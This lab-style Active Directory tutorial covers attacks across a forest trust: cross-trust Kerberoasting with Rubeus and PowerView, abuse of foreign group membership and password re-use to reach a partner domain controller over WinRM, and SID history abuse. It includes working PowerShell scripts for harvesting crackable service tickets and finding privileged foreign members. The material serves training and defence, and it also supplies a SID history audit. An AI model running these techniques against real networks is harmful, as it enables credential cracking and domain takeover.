Forest->Forest Trust
Kerberoasting
Note: Kerberos attacks such as Kerberoasting and ASREPRoasting can be performed across trusts, depending on the trust direction. They work because the trust keeps authentication enabled cross-forest: a principal in one forest can obtain an inter-realm referral ticket and request service tickets from the DCs of the partner forest. With a one-way trust only users from the trusted side can target the trusting side; with a bidirectional trust either side can target the other.
We can utilize PowerView to enumerate accounts in the target domain that have SPNs associated with them:
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName
Let's take a closer look at one of the accounts returned, for example mssqlsvc, and check which groups it belongs to, since that tells us what a cracked password would be worth:
Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc | select samaccountname,memberof
Now let's perform the Kerberoasting attack across the trust using Rubeus, specifying the target domain and the user:
.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
All that remains is to crack the TGS hash offline (hashcat mode 13100 for RC4 tickets, 19700 for AES-256). If the account is a member of a privileged group such as Domain Admins in FREIGHTLOGISTICS.LOCAL, cracking it hands us control of the partner domain.
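The same cross-trust Kerberoast carried out with plain .NET instead of PowerView and Rubeus, as an added example that is not part of the original page or of either tool's code base. It makes the individual steps visible: an LDAP bind straight to the partner domain (the local global catalog only knows the local forest), and a service-ticket request per SPN that drives the local TGT through the inter-realm referral to the FREIGHTLOGISTICS.LOCAL DC. Assumptions: the session runs as an INLANEFREIGHT.LOCAL user, the trust lets it bind to FREIGHTLOGISTICS.LOCAL over LDAP and reach its DC for Kerberos, and the function names and both domain names are placeholders taken from the page.

```powershell
# Added example, not from the original page or the Rubeus/PowerView projects.
# Assumes a trust that allows LDAP and Kerberos from INLANEFREIGHT.LOCAL to FREIGHTLOGISTICS.LOCAL.

function Get-TrustedDomainSpnAccount {
    param([Parameter(Mandatory)][string]$Domain)
    # Bind to the partner domain directly: the local global catalog only holds objects from the local forest.
    $root = [ADSI]"LDAP://$Domain"
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root)
    # Enabled user accounts carrying at least one SPN; krbtgt is excluded because its ticket is not crackable in practice.
    $searcher.Filter = '(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)' +
                       '(!(sAMAccountName=krbtgt))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
    $searcher.PageSize = 500
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@('sAMAccountName','servicePrincipalName','memberOf','pwdLastSet','msDS-SupportedEncryptionTypes'))
    foreach ($r in $searcher.FindAll()) {
        $enc = 0
        if ($r.Properties['msds-supportedencryptiontypes'].Count -gt 0) { $enc = [int]$r.Properties['msds-supportedencryptiontypes'][0] }
        [pscustomobject]@{
            SamAccountName    = [string]$r.Properties['samaccountname'][0]
            SPNs              = @($r.Properties['serviceprincipalname'] | ForEach-Object { [string]$_ })
            MemberOf          = @($r.Properties['memberof'] | ForEach-Object { [string]$_ })
            PwdLastSet        = [datetime]::FromFileTime([int64]$r.Properties['pwdlastset'][0])
            # 0 means the attribute is unset: the KDC then issues RC4 (etype 23) tickets, which crack far faster than AES.
            SupportedEncTypes = $enc
        }
    }
}

function Request-ServiceTicket {
    param([Parameter(Mandatory)][string[]]$Spn)
    Add-Type -AssemblyName System.IdentityModel
    foreach ($s in $Spn) {
        try {
            # Requesting a token for the SPN drives the full exchange: local TGT -> inter-realm referral TGT
            # -> TGS issued by the partner DC, encrypted with the service account's key. The TGS is cached in
            # this logon session, where Rubeus (dump) or Mimikatz (kerberos::list /export) can read it for cracking.
            $null = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $s
            [pscustomobject]@{ SPN = $s; Requested = $true; Error = $null }
        } catch {
            [pscustomobject]@{ SPN = $s; Requested = $false; Error = $_.Exception.Message }
        }
    }
}

# Usage: list the candidates (group membership tells you what a cracked password is worth), then request the tickets.
$accounts = Get-TrustedDomainSpnAccount -Domain 'FREIGHTLOGISTICS.LOCAL'
$groups = @{ n = 'MemberOf'; e = { ($_.MemberOf | ForEach-Object { ($_ -split ',')[0] -replace '^CN=' }) -join ', ' } }
$accounts | Select-Object SamAccountName, PwdLastSet, SupportedEncTypes, $groups | Format-Table -AutoSize
$accounts | ForEach-Object { Request-ServiceTicket -Spn $_.SPNs }
klist   # the new tickets appear with Server: <SPN> @ FREIGHTLOGISTICS.LOCAL
```

Rubeus collapses all of this into one command and prints the hash in hashcat format; the manual path is worth knowing because it needs nothing but a standard PowerShell session and makes it obvious when a request fails at the referral stage (a one-way trust in the wrong direction, or name suffix routing that does not cover the SPN's domain). Accounts with SupportedEncTypes of 0 and an old PwdLastSet are the ones to prioritise.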
Admin Password Re-Use & Group Membership
Sometimes we'll run into situations where admin users in one domain are also admin users in another domain, so it is always worth checking for password re-use between domains (for example, trying a password or hash obtained in the first domain against the same account names in the partner domain).
We may also see members of one domain that are also members of groups in another domain. Only Domain Local groups can contain security principals from outside their own forest, so this is where such membership turns up; the built-in groups such as Administrators are Domain Local. We can use the PowerView function Get-DomainForeignGroupMember to enumerate groups with members that do not belong to the domain, also known as foreign group membership.
Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL
This shows the MemberName as a SID, and if we convert it we get the domain and account it refers to:
Convert-SidToName S-1-5-21-3842939050-3880317879-2865463114-500
Here, for example, we see that the built-in Administrators group in FREIGHTLOGISTICS.LOCAL has the built-in Administrator account (RID 500) of the INLANEFREIGHT.LOCAL domain as a member:
PS C:\htb> Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL

GroupDomain             : FREIGHTLOGISTICS.LOCAL
GroupName               : Administrators
GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=FREIGHTLOGISTICS,DC=LOCAL
MemberDomain            : FREIGHTLOGISTICS.LOCAL
MemberName              : S-1-5-21-3842939050-3880317879-2865463114-500
MemberDistinguishedName : CN=S-1-5-21-3842939050-3880317879-2865463114-500,CN=ForeignSecurityPrincipals,DC=FREIGHTLOGISTICS,DC=LOCAL

PS C:\htb> Convert-SidToName S-1-5-21-3842939050-3880317879-2865463114-500

INLANEFREIGHT\administrator

We can verify this access using the Enter-PSSession cmdlet to connect over WinRM:
Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator
With that we successfully authenticate to the Domain Controller in the FREIGHTLOGISTICS.LOCAL domain using the Administrator account from the INLANEFREIGHT.LOCAL domain, across the bidirectional forest trust. This can be a quick win after taking control of a domain and is always worth checking for when a bidirectional forest trust is present during an assessment and the second forest is in scope.
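The foreign group membership check done with plain ADSI/.NET, as an added example that is not part of the original page or of PowerView. It queries the ForeignSecurityPrincipals container of the partner domain directly, skips the well-known SIDs that always live there, resolves each foreign SID (and keeps the raw SID when the trust direction prevents resolution, since the domain prefix is still informative), and flags privileged groups so the candidates for password re-use surface first. Assumptions: the trust lets the current session bind to FREIGHTLOGISTICS.LOCAL over LDAP and resolve INLANEFREIGHT.LOCAL SIDs; the function name, the list of high-value groups and both domain names are the author's placeholders.

```powershell
# Added example, not from the original page or the PowerView project.
# Assumes LDAP access to the partner domain through the trust; domain names are placeholders.

function Get-ForeignGroupMembership {
    param([Parameter(Mandatory)][string]$Domain)
    $root = [ADSI]"LDAP://$Domain"
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root)
    # Any principal from outside this domain that was added to a group gets a stub object under
    # CN=ForeignSecurityPrincipals; its memberOf attribute points at the groups in question.
    $searcher.Filter = '(&(objectClass=foreignSecurityPrincipal)(memberOf=*))'
    $searcher.PageSize = 500
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@('objectSid','memberOf'))
    # Groups whose foreign members matter most; extend to taste (placeholder list, not from the page).
    $highValue = '^CN=(Administrators|Domain Admins|Enterprise Admins|Account Operators|Backup Operators|Server Operators|Remote Desktop Users|Remote Management Users),'
    foreach ($r in $searcher.FindAll()) {
        $sid = New-Object System.Security.Principal.SecurityIdentifier([byte[]]$r.Properties['objectsid'][0], 0)
        # Well-known SIDs (S-1-5-11 Authenticated Users, S-1-5-9 Enterprise Domain Controllers, ...) are stored here too;
        # only S-1-5-21-* domain SIDs point at accounts in another domain.
        if ($sid.Value -notlike 'S-1-5-21-*') { continue }
        # Translation works when the trust direction lets the local DC ask the foreign domain; otherwise keep the
        # raw SID, whose domain prefix still tells you which domain the member belongs to.
        try { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { $name = $sid.Value }
        foreach ($groupDn in $r.Properties['memberof']) {
            [pscustomobject]@{
                GroupDomain    = $Domain
                GroupName      = ([string]$groupDn -split ',')[0] -replace '^CN='
                GroupDN        = [string]$groupDn
                MemberSid      = $sid.Value
                MemberName     = $name
                # RID 500 is the built-in Administrator of the member's own domain, whatever it was renamed to.
                IsBuiltinAdmin = $sid.Value -like '*-500'
                HighValueGroup = [bool]([string]$groupDn -match $highValue)
            }
        }
    }
}

# Usage: privileged foreign members first; each one is a candidate for the Enter-PSSession check shown above.
Get-ForeignGroupMembership -Domain 'FREIGHTLOGISTICS.LOCAL' |
    Sort-Object HighValueGroup, IsBuiltinAdmin -Descending |
    Format-List GroupName, GroupDN, MemberSid, MemberName, HighValueGroup
```

Running this against both domains of a bidirectional trust is worthwhile: a foreign admin in the partner domain's Administrators group is the obvious finding, but a foreign account sitting in Remote Management Users or Backup Operators is a quieter path to the same outcome.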
SID History Abuse
If the SID of an account with administrative privileges in Forest A is added to the SID history (sIDHistory) attribute of an account in Forest B, then, assuming that account can authenticate across the trust, it will carry Forest A's admin SID in its tickets and will have administrative privileges when accessing resources in the partner forest. The caveat is SID filtering: it is enabled by default on forest trusts, and the trusting forest's DCs drop any SID in an incoming inter-realm ticket that does not belong to the trusted forest, which removes the injected SID. The technique therefore only works across a forest trust when SID filtering has been relaxed, whereas trusts within a single forest (parent/child) do not filter SID history at all.
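An added example, not part of the original page, showing the two checks a practitioner wants around SID history: an audit of sIDHistory values in a domain, flagging entries whose domain prefix is foreign to that domain and entries with well-known privileged RIDs, and a read of the local trustedDomain objects to see whether SID filtering is in force on the trust before attempting any injection. Assumptions: the session can bind to both domains over LDAP; the function names and the domain names are placeholders from the page; the trustAttributes bit values are the standard TRUST_ATTRIBUTE_* flags.

```powershell
# Added example, not from the original page. Assumes LDAP access to both domains through the trust.

function Get-SidHistoryAudit {
    param([Parameter(Mandatory)][string]$Domain)
    $root = [ADSI]"LDAP://$Domain"
    $domainSid = (New-Object System.Security.Principal.SecurityIdentifier([byte[]]$root.Properties['objectSid'].Value, 0)).Value
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root, '(sIDHistory=*)')
    $searcher.PageSize = 500
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@('sAMAccountName','sIDHistory'))
    # RIDs that are privileged in every domain, whatever the account or group was renamed to.
    $privilegedRids = @{ 500 = 'Administrator'; 512 = 'Domain Admins'; 516 = 'Domain Controllers'; 518 = 'Schema Admins'; 519 = 'Enterprise Admins' }
    foreach ($r in $searcher.FindAll()) {
        foreach ($raw in $r.Properties['sidhistory']) {
            $sid = New-Object System.Security.Principal.SecurityIdentifier([byte[]]$raw, 0)
            $rid = [int](($sid.Value -split '-')[-1])
            try { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { $name = '<unresolved>' }
            [pscustomobject]@{
                Account       = [string]$r.Properties['samaccountname'][0]
                HistorySid    = $sid.Value
                ResolvesTo    = $name
                # Legitimate migrations copy SIDs from the old domain, so a foreign prefix alone is not proof of abuse;
                # a foreign prefix combined with a privileged RID, or one resolving to a live admin, is what to chase.
                ForeignDomain = [bool]($sid.AccountDomainSid -and $sid.AccountDomainSid.Value -ne $domainSid)
                PrivilegedRid = $privilegedRids[$rid]
            }
        }
    }
}

function Get-TrustSidFilteringState {
    param([Parameter(Mandatory)][string]$Domain)
    $root = [ADSI]"LDAP://$Domain"
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root, '(objectClass=trustedDomain)')
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@('name','trustDirection','trustAttributes'))
    $directions = @{ 1 = 'Inbound'; 2 = 'Outbound'; 3 = 'Bidirectional' }
    foreach ($r in $searcher.FindAll()) {
        $attr = [int]$r.Properties['trustattributes'][0]
        [pscustomobject]@{
            Partner          = [string]$r.Properties['name'][0]
            Direction        = $directions[[int]$r.Properties['trustdirection'][0]]
            ForestTransitive = [bool]($attr -band 0x8)    # TRUST_ATTRIBUTE_FOREST_TRANSITIVE
            Quarantined      = [bool]($attr -band 0x4)    # TRUST_ATTRIBUTE_QUARANTINED_DOMAIN: SID filter quarantining enforced
            TreatAsExternal  = [bool]($attr -band 0x40)   # TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL: forest trust filtered like an external one
        }
    }
}

# Usage: read the trust flags first (no point injecting a SID that filtering strips), then hunt for foreign history entries.
Get-TrustSidFilteringState -Domain 'INLANEFREIGHT.LOCAL' | Format-Table -AutoSize
Get-SidHistoryAudit -Domain 'FREIGHTLOGISTICS.LOCAL' | Where-Object { $_.ForeignDomain } | Format-Table -AutoSize
```

From the defensive side the same audit is the detection: any sIDHistory value with a foreign domain prefix and a privileged RID that is not explained by a documented migration deserves an immediate look, and the trust flags tell you whether a forest trust has been weakened from its default.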